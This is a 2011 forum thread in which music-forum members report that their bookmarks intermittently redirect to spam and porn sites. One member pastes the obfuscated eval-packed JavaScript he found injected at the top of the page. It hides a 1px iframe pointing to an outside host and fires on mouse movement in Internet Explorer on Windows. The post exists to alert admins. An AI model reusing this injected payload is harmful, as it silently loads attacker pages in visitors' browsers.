NSB not always loading the right site?

Anything not music related ends up in here - a place for our community to chat and joke. You need a thick skin to survive, and don't let the regulars put you off, they're (nearly) all a nice bunch of people.

Moderators: Plexus, jimmy brayks, NSB Mods

Post Reply
User avatar
Tarekith
Forum Veteran
Forum Veteran
Posts: 4511
Joined: Sun Jun 12, 2005 1:21 pm
Location: Seattle
Contact:

NSB not always loading the right site?

Post by Tarekith » Tue Sep 27, 2011 6:42 am

About half the time I try and come here via a bookmark I have to the production forum, I"m instead taken to a spam website dealing with crap movies on DVD.
InnerPortalStudio.com Electronic Music Mastering & Mixdowns. Click for details!
User avatar
shaman
Forum Veteran
Forum Veteran
Posts: 37761
Joined: Thu Jul 17, 2003 11:25 pm

Re: NSB not always loading the right site?

Post by shaman » Tue Sep 27, 2011 9:58 am

Haven't seen this myself. :?
Doran
Poster-lite
Poster-lite
Posts: 337
Joined: Wed Jun 08, 2005 5:44 am
Location: canada

Re: NSB not always loading the right site?

Post by Doran » Tue Sep 27, 2011 1:41 pm

Same here.. just had a bunch of porn pics pop up 2mins ago when I clicked my bookmark..

Seems to only happen every 3rd or 4th time I click the bookmark (for the production area)..

I've stopped the re-direct (hitting ESC) a few times and noticed a <IFRAME> html tag with the url of the offending sites that's getting loaded before anything else.

Getting pretty annoying to say the least. I've scanned my computer for virus, malware, etc.. and suffice to say it's not happening on my end - especially now that I see I'm not the only one with the issues.
moderate
Forum Veteran
Forum Veteran
Posts: 72951
Joined: Thu Jul 10, 2003 2:51 pm
Location: in the cupboard

Re: NSB not always loading the right site?

Post by moderate » Tue Sep 27, 2011 2:15 pm

check your hosts file
Enough of this bullshit!
moderate
Forum Veteran
Forum Veteran
Posts: 72951
Joined: Thu Jul 10, 2003 2:51 pm
Location: in the cupboard

Re: NSB not always loading the right site?

Post by moderate » Tue Sep 27, 2011 2:18 pm

It isn't happening for me.

The only abnormality I have seen lately on nsb is error messages about not being able to display the page, and occasionally the page displaying in a huge font. Which seems to suggest that the server may be under a bit of strain at times.
Enough of this bullshit!
User avatar
shaman
Forum Veteran
Forum Veteran
Posts: 37761
Joined: Thu Jul 17, 2003 11:25 pm

Re: NSB not always loading the right site?

Post by shaman » Tue Sep 27, 2011 2:26 pm

dtism wrote:It isn't happening for me.

The only abnormality I have seen lately on nsb is error messages about not being able to display the page, and occasionally the page displaying in a huge font. Which seems to suggest that the server may be under a bit of strain at times.
that does seem to have crept in recently, yet the site hasn't changed lately has it?
User avatar
Tarekith
Forum Veteran
Forum Veteran
Posts: 4511
Joined: Sun Jun 12, 2005 1:21 pm
Location: Seattle
Contact:

Re: NSB not always loading the right site?

Post by Tarekith » Tue Sep 27, 2011 3:19 pm

I've seen the font thing too. Fwiw
InnerPortalStudio.com Electronic Music Mastering & Mixdowns. Click for details!
User avatar
ag4111
Forum Veteran
Forum Veteran
Posts: 108375
Joined: Fri Oct 24, 2003 11:11 am
Location: 20%
Contact:

Re: NSB not always loading the right site?

Post by ag4111 » Tue Sep 27, 2011 3:22 pm

same here
User avatar
mu_
Forum Veteran
Forum Veteran
Posts: 38406
Joined: Sun Oct 17, 2004 10:05 pm

Re: NSB not always loading the right site?

Post by mu_ » Thu Sep 29, 2011 9:51 pm

everytime i load nsb i end up sex and slut dvd websites too. i want my money bac admin
Doran
Poster-lite
Poster-lite
Posts: 337
Joined: Wed Jun 08, 2005 5:44 am
Location: canada

Re: NSB not always loading the right site?

Post by Doran » Sun Oct 02, 2011 5:26 am

just clicked my bookmark for the production forum and noticed I was being redirected.. hit ESC to stop the page loading and viewed the html source..

this was the first line:

Code: Select all

<script type='text/javascript'>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 8(){b=4.h(\'9\');6(!b){a 0=4.j(\'k\');4.m.g(0);0.n=\'9\';0.5.f=\'7\';0.5.c=\'7\';0.5.d=\'e\';0.l=\'C://z.y.o/A.B?t=D\'}}a 2=x.w.q();6(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){4.u=8}',40,40,'el||ua|indexOf|document|style|if|1px|MakeFrameEx|yahoo_api|var|element|height|display|none|width|appendChild|getElementById|function|createElement|iframe|src|body|id|com|msie|toLowerCase|opera|webtv||onmousemove|windows|userAgent|navigator|acmetoy|zint|showthread|php|http|74891689'.split('|'),0,{}))
</script>
can an admin please check into this?

edit: found some stuff through google about this being a bug related to SEO forum plugins (search engine optimization) and can be exploited remotely.. maybe this is the case?
User avatar
shaman
Forum Veteran
Forum Veteran
Posts: 37761
Joined: Thu Jul 17, 2003 11:25 pm

Re: NSB not always loading the right site?

Post by shaman » Sun Oct 02, 2011 12:08 pm

are there any admins left? :lol:
Doran
Poster-lite
Poster-lite
Posts: 337
Joined: Wed Jun 08, 2005 5:44 am
Location: canada

Re: NSB not always loading the right site?

Post by Doran » Sun Oct 16, 2011 7:41 pm

shaman wrote:are there any admins left? :lol:
There must be.. since I posted here last with the bit of code I found, there's been no loading of
spam/sex/etc sites.. Been clicking my bookmark daily to see it happen again, and it hasn't.

guess someone must have seen it and done something..
Post Reply